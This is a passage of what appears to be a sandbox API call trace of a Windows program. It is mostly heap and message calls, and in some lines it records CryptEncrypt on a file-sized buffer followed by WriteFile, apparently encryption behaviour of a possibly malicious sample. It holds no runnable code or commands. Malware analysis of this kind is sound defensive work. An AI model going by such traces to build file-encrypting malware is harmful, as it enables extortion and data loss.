Size=0x10) returned 0x2aa99d0 [0106.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.028] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.028] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0106.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.029] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0106.029] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0106.029] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0106.029] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0106.029] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0106.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0106.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8c7f0 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0106.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0106.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0106.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0106.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0106.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0106.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0106.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0106.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ef8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0106.032] CryptEncrypt (in: hKey=0x9a48c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x6236, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x6238) returned 1 [0106.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.032] CharLowerBuffW (in: lpsz="byte[25144]", cchLength=0xb | out: lpsz="byte[25144]") returned 0xb [0106.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.033] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.033] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0106.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9c40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0106.033] CryptEncrypt (in: hKey=0x9a48c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a8c7f0*, pdwDataLen=0x8cef60*=0x6236, dwBufLen=0x6238 | out: pbData=0x2a8c7f0*, pdwDataLen=0x8cef60*=0x6238) returned 1 [0106.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.035] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0106.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.035] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0106.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.035] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0106.035] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.035] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0106.035] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.035] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.035] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.035] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.035] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.038] WriteFile (in: hFile=0x458, lpBuffer=0x2a80370*, nNumberOfBytesToWrite=0x6238, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a80370*, lpNumberOfBytesWritten=0x8cf5e4*=0x6238, lpOverlapped=0x0) returned 1 [0106.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.039] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0106.039] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.039] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0106.039] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.039] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.039] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.039] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0106.039] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.040] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0106.040] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0106.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa99b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0106.040] CryptDestroyKey (hKey=0x9a48c0) returned 1 [0106.040] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.040] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.040] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0106.040] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.040] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0106.040] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.040] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.040] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0106.040] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0106.040] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: 